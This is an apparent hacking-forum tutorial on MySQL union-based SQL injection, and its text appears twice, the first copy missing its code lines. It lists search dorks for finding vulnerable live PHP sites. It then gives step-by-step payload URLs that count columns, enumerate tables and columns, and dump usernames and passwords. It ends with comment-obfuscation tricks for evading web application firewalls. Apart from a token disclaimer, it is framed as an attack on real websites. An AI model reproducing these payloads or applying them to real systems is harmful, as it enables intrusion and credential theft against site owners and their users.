[disclaimer]
For Educational / Security Uses Only
DISCLAIMER: I or the forum are not responsible for what you do with this information. For Educational / Security purposes only.
BE SURE TO READ FULLY!
THIS TUTORIAL IS COPYRIGHTED. YOU MAY NOT USE IT ANYWHERE ELSE WITHOUT MY EXPRESS WRITTEN PERMISSION. And I will FIRE MY DMCA LETTERS AT YOU!
Let me first start out by saying: this is not MSSQL injection, so this will not work on pages with an extension other than .php such as .asp or .aspx.
What is a SQL Injection?
SQL injection, in the form as shown below, is the modification of a URL in order to manipulate a MySQL server into returning important data. In a nutshell.
How to Find Vulnerable Sites
In order to perform a SQLi attack, you will need a vulnerable website. The best way is to use what's called a dork. A dork is a search query used to show websites that match your query. Here are some:
(For use on Googleâ„¢)
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Use these dorks, or come up with your own, to find vulnerable websites using Googleâ„¢.
Testing Your Target for Vulnerability
To test if your selected website is vulnerable to SQLi, add an apostrophe ( ' ) to the end of the variable. As shown below.
If adding an apostrophe returns some sort of MySQL error, then your target is vulnerable.
ORDER BY
After confirming the vulnerability in your target, use the ORDER BY command to extract the number of columns in the database.
Ex.
Doing ORDER BY 1-- should always return the original page with NO error.
Then do ORDER BY 2--
If this shows the original page with NO error, continue.
Now try ORDER BY 3--
If this shows the original page with NO error, continue.
Continue increasing the ORDER BY number until you reach an error. For instance, if doing ORDER BY 10-- returns an error, then I have NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.
UNION SELECT
After getting the number of columns, let's say we have NINE columns. Then you would type this:
You should see a page with a few numbers scattered throughout it. If so, continue, if NOT, try this:
Notice the hyphen between the number one and id=. If this produces the scattered numbers, continue, if not, move on to another target.
database()
After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.
That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.
group_concat
This is where everything gets a little trickier! This is also the part where you will be extracting data. (Woohoo! Finally!)
After extracting the name of the database using database(), type this where you typed database() in the previous step.
TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.
In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:
This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password." The columns "username" and "password" contain the data we want to extract.
To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:
Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users."
All of this will produce even MORE text in this format:
The comma separates each set of data.
That's the end of the BASIC portion of this tutorial.
Web Application Firewalls
IF YOU ARE STOPPED AT ANY PORTION OF THE ABOVE DUE TO SOMETHING LIKE A 406 NOT ACCEPTABLE ERROR, READ ON.
At this time, I am not going to go into full detail with regard to what's below. I will, however, try to answer your questions.
Okay, so you are stuck. You could be at any part, like ORDER BY or UNION SELECT.
If you are stuck at order by, here are two ways to help you try to get back up and running.
If you type ORDER BY 10000000000-- and STILL get NO error, then your target is either NOT vulnerable OR it IS vulnerable, but to a separate type of injection known as a string injection. Here's how to do it.
Instead of typing
, type
. NOTICE THE APOSTROPHE, AND THE SPACE AND THE SECOND HYPHEN AT THE END.
You should now have an error and you can continue with the rest.
If ORDER BY is blocked in some way, type this
If you type UNION ALL SELECT and it is blocked in some way, try typing this instead:
If that doesn't work, try this:
For now, that is all.
Thank you for reading, and I hope this helps everyone!
For Educational / Security Uses Only
DISCLAIMER: I or the forum are not responsible for what you do with this information. For Educational / Security purposes only.
BE SURE TO READ FULLY!
THIS TUTORIAL IS COPYRIGHTED. YOU MAY NOT USE IT ANYWHERE ELSE WITHOUT MY EXPRESS WRITTEN PERMISSION. And I will FIRE MY DMCA LETTERS AT YOU!
Let me first start out by saying: this is not MSSQL injection, so this will not work on pages with an extension other than .php such as .asp or .aspx.
What is a SQL Injection?
SQL injection, in the form as shown below, is the modification of a URL in order to manipulate a MySQL server into returning important data. In a nutshell.
How to Find Vulnerable Sites
In order to perform a SQLi attack, you will need a vulnerable website. The best way is to use what's called a dork. A dork is a search query used to show websites that match your query. Here are some:
(For use on Googleâ„¢)
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Use these dorks, or come up with your own, to find vulnerable websites using Googleâ„¢.
Testing Your Target for Vulnerability
To test if your selected website is vulnerable to SQLi, add an apostrophe ( ' ) to the end of the variable. As shown below.
Code:
http://www.site.com/index.php?id=1'If adding an apostrophe returns some sort of MySQL error, then your target is vulnerable.
ORDER BY
After confirming the vulnerability in your target, use the ORDER BY command to extract the number of columns in the database.
Ex.
Code:
http://www.site.com/index.php?id=1 ORDER BY 1--Doing ORDER BY 1-- should always return the original page with NO error.
Then do ORDER BY 2--
If this shows the original page with NO error, continue.
Now try ORDER BY 3--
If this shows the original page with NO error, continue.
Continue increasing the ORDER BY number until you reach an error. For instance, if doing ORDER BY 10-- returns an error, then I have NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.
UNION SELECT
After getting the number of columns, let's say we have NINE columns. Then you would type this:
Code:
http://www.site.com/index.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--You should see a page with a few numbers scattered throughout it. If so, continue, if NOT, try this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--Notice the hyphen between the number one and id=. If this produces the scattered numbers, continue, if not, move on to another target.
database()
After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.
group_concat
This is where everything gets a little trickier! This is also the part where you will be extracting data. (Woohoo! Finally!)
After extracting the name of the database using database(), type this where you typed database() in the previous step.
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.
In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password." The columns "username" and "password" contain the data we want to extract.
To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:
Code:
http://www.site.com/index.php?id=-1 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users--Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users."
All of this will produce even MORE text in this format:
Code:
admin:thisismypass:,The comma separates each set of data.
That's the end of the BASIC portion of this tutorial.
Web Application Firewalls
IF YOU ARE STOPPED AT ANY PORTION OF THE ABOVE DUE TO SOMETHING LIKE A 406 NOT ACCEPTABLE ERROR, READ ON.
At this time, I am not going to go into full detail with regard to what's below. I will, however, try to answer your questions.
Okay, so you are stuck. You could be at any part, like ORDER BY or UNION SELECT.
If you are stuck at order by, here are two ways to help you try to get back up and running.
If you type ORDER BY 10000000000-- and STILL get NO error, then your target is either NOT vulnerable OR it IS vulnerable, but to a separate type of injection known as a string injection. Here's how to do it.
Instead of typing
Code:
/index.php?id=1 ORDER BY 10000000--
Code:
/index.php?id=1' ORDER BY 10000000-- -You should now have an error and you can continue with the rest.
If ORDER BY is blocked in some way, type this
Code:
/*!ORDER BY*/If you type UNION ALL SELECT and it is blocked in some way, try typing this instead:
Code:
/*!UNION*/ ALL /*!SELECT*/If that doesn't work, try this:
Code:
/*!UNIunionON*/ ALL /*!SEselectLECT*/For now, that is all.
Thank you for reading, and I hope this helps everyone!